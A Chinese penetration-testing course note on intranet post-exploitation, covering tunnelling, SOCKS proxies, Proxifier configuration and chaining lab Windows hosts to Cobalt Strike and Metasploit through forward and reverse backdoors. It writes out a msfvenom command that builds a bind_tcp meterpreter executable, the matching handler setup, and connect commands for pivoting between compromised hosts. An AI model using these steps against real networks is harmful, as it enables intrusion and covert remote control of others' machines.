内网安全[3]-代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线

1.环境

隧道技术:

隧道技术是一类网络协议,它是一种数据包封装技术,它将原始IP包(其报头包含原始发送者和最终目的地)封装在另外一个数据包(称为封装的IP包)的数据净荷中进行传输,使用隧道的原因是在不兼容的网络上传输数据,或在不安全网络上提供一个安全路径,隧道协议通常(但并非总是)在一个比负载协议还高的层级或同一层。

简单来说就是通过网络隧道,可以使其隧道两端的网络进行互相通信,形成一个更到的网络,并且可以将不支持的协议数据包打包成支持的协议数据包后进行数据传输。

代理软件:

SocksCap Proxifier ProxyChains

代理协议:

SOCKS4/5

SOCKS代理与其他类型的代理不同,它只是简单地传递数据包,而并不关心是何种应用协议,既可以是HTTP请求,所以SOCKS代理服务器比其他类型的代理服务器速度要快得多。SOCKS代理又分为SOCKS4和SOCKS5,二者不同的是SOCKS4代理只支持TCP协议(即传输控制协议),而SOCKS5代理则既支持TCP协议又支持UDP协议(即用户数据包协议),还支持各种身份验证机制、服务器端域名解析等。SOCK4能做到的SOCKS5都可得到,但SOCKS5能够做到的SOCKS则不一定能做到。

实现两个目的:

(1)通讯后的渗透测试横向移动

(2)通讯后的控制上线CS&MSF

控制之前 肯定要得到权限 权限怎么知道 渗透测试流程网络通讯肯定是正常的才可以

忽视利用什么漏洞方式拿到的权限

**前提条件:**能进行通讯

两个部分:

(1)如何进行通讯

(2)如何拿到权限 没讲 横向移动课程

(3)如何进行控制

2.控制访问多台机器方法

使用木马上线控制win7

win10上线方法

正向

后门执行后数据交给本地2222端口 控制器连接当前的2222端口

反向

后门执行后数据交给远程2222端口 控制器监听的2222

win7上线》右击代理转发》socks代理》设置代理端口

Proxifier设置代理

设置配置文件代理服务器添加地址:攻击机的地址端口刚刚上面生成的端口查看会话窗口回显的socks版本,根据版本选择检查

设置配置文件代理规则添加名称随意应用程序默认目标主机选择Windows2008地址动作选择刚刚创建的

我们需要正向链接,生成本地后门,执行后的权限把数据交给本地2222端口。win7控制器链接当前win10的2222。win7和CS通信,至此可以访问win10

bind_tcp 没有host,因为直接给的本地

(反向后门:后门执行完交给控制器的2222,控制器再监听自己本地的2222)

cs上线win10

使用win10的CMD权限(信息搜集提权等操作取得的CMD权限)执行后门,并不会上线

需要在win7的会话中访问win10 connect 192.168.11.129 2222即可上线

用192.168.11.128(win7)去控制192.168.11.129(win10)

MSF上线win10

正向链接

msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333 -f exe > 2003.exe

监听

use exploit/multi/handler

set payload windows/meterpreter/bind_tcp

set rhost 192.168.11.129 ##目标地址

set lport 3333

run

session会话

cs建立节点

然后探测资产信息,提权,正向链接

上线

建立监听,正向链接,生成后门,将后门放入win2012,执行后门

需要在win2008的会话中访问win2012 connect 192.168.33.130 4444即可上线

剩下同上

入栈严格怎么办?

相关推荐
独行soc3 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍06-基于子查询的SQL注入(Subquery-Based SQL Injection)
数据库·sql·安全·web安全·漏洞挖掘·hw
独行soc5 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍08-基于时间延迟的SQL注入(Time-Based SQL Injection)
数据库·sql·安全·渗透测试·漏洞挖掘
fantasy_arch5 小时前
CPU性能优化-磁盘空间和解析时间
网络·性能优化
Clockwiseee6 小时前
php伪协议
windows·安全·web安全·网络安全
黑客Ash7 小时前
安全算法基础(一)
算法·安全
云云3217 小时前
搭建云手机平台的技术要求?
服务器·线性代数·安全·智能手机·矩阵
云云3217 小时前
云手机有哪些用途?云手机选择推荐
服务器·线性代数·安全·智能手机·矩阵
是Dream呀7 小时前
Python从0到100(七十八):神经网络--从0开始搭建全连接网络和CNN网络
网络·python·神经网络
xcLeigh7 小时前
网络安全 | 防火墙的工作原理及配置指南
安全·web安全
白乐天_n7 小时前
腾讯游戏安全移动赛题Tencent2016A
安全·游戏